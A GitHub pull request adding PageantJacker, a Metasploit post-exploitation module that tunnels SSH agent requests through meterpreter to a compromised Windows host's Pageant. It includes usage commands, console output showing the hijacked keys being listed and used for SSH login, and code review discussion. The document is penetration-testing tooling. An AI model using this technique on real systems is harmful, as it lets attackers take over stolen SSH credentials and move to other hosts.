### PR TITLE
PageantJacker (POST Module)

### PR DESCRIPTION
**Pull request by stufus**
# Overview

PageantJacker is designed to allow SSH agent commands and data to be forwarded through meterpreter, between a UNIX ssh agent client and a Windows Pageant server. An example of a use case is one in which a penetration tester running Metasploit has been able to upload meterpreter onto a remote Windows machine and has discovered that Pageant is running with keys loaded. This extension would allow them to interact with the agent as if it was local. Commands such as 'ssh-add' will work natively, allowing keys to be added or deleted, and the 'ssh' client will attempt to use the keys stored in Pageant to authenticate to a host.
# Components
- PageantJacker Meterpreter extension [https://github.com/rapid7/meterpreter/pull/164]
- PageantJacker Metasploit POST module [https://github.com/rapid7/metasploit-framework/pull/5380]

Note that the PuTTY Enumeration module (https://github.com/rapid7/metasploit-framework/pull/5359) may be useful in determining whether to load this extension or not.
# Usage

Once access to the target Windows system has been gained:

```
use post/windows/manage/forward_pageant
set session -1
run -j
```

This will:
- Load the PageantJacker extension in Meterpreter if it is not already loaded
- Create a local socket (if you set SocketPath, you can choose where it is. If you don't, it will create a random one)
- Listen on the local socket, and forward everything it sees to the remote Pageant instance

If you then set your SSH_AUTH_SOCK environment variable to the path shown, you can then use OpenSSH commands normally, which will effectively tunnel the agent traffic through the meterpreter connection. For example:

| Command | Description |
| --- | --- |
| ssh-add -l | List the keys stored in Pageant |
| ssh-add -D | Delete all keys in Pageant |
| ssh 127.0.0.1 | Attempt to SSH to 127.0.0.1 & will try the keys from Pageant |
# Example

Pageant is running on the target machine as shown below: 

pageant

Firstly, set up the post module:

```
msf  exploit(handler) > use post/windows/manage/forward_pageant 
msf  post(forward_pageant) > show options

Module options (post/windows/manage/forward_pageant):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SESSION                      yes       The session to run this module on.
   SocketPath                   no        Specify a filename for the local UNIX socket.

msf  post(forward_pageant) > set SESSION 1
SESSION => 1
msf  post(forward_pageant) > set VERBOSE true
VERBOSE => true
msf  post(forward_pageant) > run

[*] Loading PageantJacker extension on session 1 (192.0.2.102)
[*] Launched listening socket on /tmp/pageantjacker20150519-10390-1r085nz-5
[*] Set SSH_AUTH_SOCK variable to /tmp/pageantjacker20150519-10390-1r085nz-5 (e.g. export SSH_AUTH_SOCK="/tmp/pageantjacker20150519-10390-1r085nz-5")
[*] Now use any tool normally (e.g. ssh-add)
```

At this point, run the following commands to demonstrate interaction with Pageant locally:

```
$ export SSH_AUTH_SOCK="/tmp/pageantjacker20150519-10390-1r085nz-5"
$ ssh-add -l
16384 25:c9:43:49:a1:0b:2d:cf:a3:29:e8:2c:0f:56:48:35 PageantJacker Demo (RSA)
$
```

As Verbose = TRUE, the following output will be displayed in the Metasploit console:

```
[*] PageantJacker: Received data from socket (size: 5)
[*] PageantJacker: Response received (Success='true' Size='9' Error='No error.')
[*] PageantJacker: Received data from socket (size: 5)
[*] PageantJacker: Response received (Success='true' Size='2106' Error='No error.')
```

Now attempt to connect to `192.0.2.1` using the keys in Pageant:

```
$ ssh -v 192.0.2.1
OpenSSH_6.6.1p1, OpenSSL 1.0.1j-freebsd 15 Oct 2014

...redacted...

debug1: ssh_ecdsa_verify: signature correct
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: SSH2_MSG_NEWKEYS received
debug1: Roaming not allowed by server
debug1: SSH2_MSG_SERVICE_REQUEST sent
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug1: Next authentication method: publickey
debug1: Offering RSA public key: PageantJacker Demo
debug1: Server accepts key: pkalg ssh-rsa blen 2071
...
```

As testing is now complete, ^C will clean up by closing and deleting the socket file locally.

```
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf  post(forward_pageant) >
```

Obviously, the local commands will no longer work because the module has been closed

```
$ echo $SSH_AUTH_SOCK
/tmp/pageantjacker20150519-10390-1r085nz-5
$ ssh-add -l
Could not open a connection to your authentication agent.
$ ls -la /tmp/pageantjacker20150519-10390-1r085nz-5
ls: /tmp/pageantjacker20150519-10390-1r085nz-5: No such file or directory
```

Note that the module can be executed as a background job by running `run -j` and then killed using `jobs -k`.

### CODE REVIEW

File: modules/post/windows/manage/forward_pageant.rb [hunk 1]
```diff
@@ -0,0 +1,105 @@
...
+            print_error("PageantJacker: Unsuccessful response received (#{response[:error]})")
+          end
+        end
+      end
+    end
+  end
+
+  def cleanup
+    # Remove the socket that we created, if it still exists
+    ::File.delete(@sockpath) if ::File.exist?(@sockpath) if @sockpath
```
Comment (stufus) [inline modules/post/windows/manage/forward_pageant.rb]: This is a rubocop autocorrection!

**Comment by Meatballs1** [comment]
Next steps are to add, an `ssh_agent_login`, module or extend `ssh_login`, to take advantage of this from with MSF itself :)

**Comment by stufus** [comment]
@Meatballs1: Yep....not sure how easy that'll be though, but I was looking at whether it is possible to extend ssh_identify_pubkeys to map keys. I'm guessing not because we would not have the actual key, merely the opportunity to authenticate against it.

**Comment by Meatballs1** [comment]
`identify_pubkeys` doesn't attempt to login and send you back a shell `ssh_login_pubkeys` does afaik :)

File: modules/post/windows/manage/forward_pageant.rb (hunk 1 above)
Comment (jlee-r7) [inline modules/post/windows/manage/forward_pageant.rb]: That's... it's, uh... I don't like that.  =)

Comment (Meatballs1) [inline modules/post/windows/manage/forward_pageant.rb]: I'm not sure why it didn't go for:

`::File.delete(@sockpath) if @sockpath && ::File.exist?(@sockpath)`

File: modules/post/windows/manage/forward_pageant.rb [hunk 2]
```diff
@@ -0,0 +1,109 @@
...
+      ], self.class)
+  end
+
+  def run
+
+    # Check to ensure that UNIX sockets are supported
+    begin
+      ::UNIXServer
+    rescue NameError
+      print_error("This module is only supported on a Metasploit installation that supports UNIX sockets.")
```
Comment (Meatballs1) [inline modules/post/windows/manage/forward_pageant.rb]: Should we be using `fail_with` here?

**Comment by bcook-r7** [comment]
So, I have put together a new PR on payloads with your extension migrated to extapi. On one hand, this simplified the code quite a bit. On the other hand, the shiny splash screen logo goes away. Would this be OK if we left that bit out?

The framework update is here: https://github.com/bcook-r7/metasploit-framework/tree/land-5380-pageantjacker

Specifically: https://github.com/bcook-r7/metasploit-framework/commit/61e7e1d094af7cb9339b4fe0763eaa71bff12fcc

**Comment by stufus** [comment]
@bcook-r7 Thanks for that mate, fine by me, I'll just need to modify the post modules to load extapi if it isn't already loaded but then all should be well

**Comment by bcook-r7** [comment]
I think I updated the post module too - let me send you the PR for it.

**Comment by stufus** [comment]
@bcook-r7 cheers mate

**Comment by stufus** [comment]
Thanks again @bcook-r7 for doing all of this :-)

**Comment by stufus** [comment]
@bcook-r7 What meterpreter gem version does this need to point against?

**Comment by bcook-r7** [comment]
1.0.14 has the bits

**Comment by bcook-r7** [comment]
And, landed (along with a few other meterpreter fixes). Cheers!

**Comment by Meatballs1** [comment]
:)

**Comment by WhyNotPal** [comment]
Hey everyone - 
as it happens, that module does not run anymore since the method make_tmpname is removed from Ruby 2.5 on (see https://medium.com/@maciejmensfeld/ruby-2-5-0-upgrade-remarks-100d7c0dd73d ) 
There's a proposed workaround here: 
https://github.com/rails/rails/pull/31462/files

**Comment by adfoster-r7** [comment]
@WhyNotPal Thanks for the heads up, would you mind raising a separate issue to keep track of that? Otherwise this might get missed and not get fixed 👍

**Pull request merged**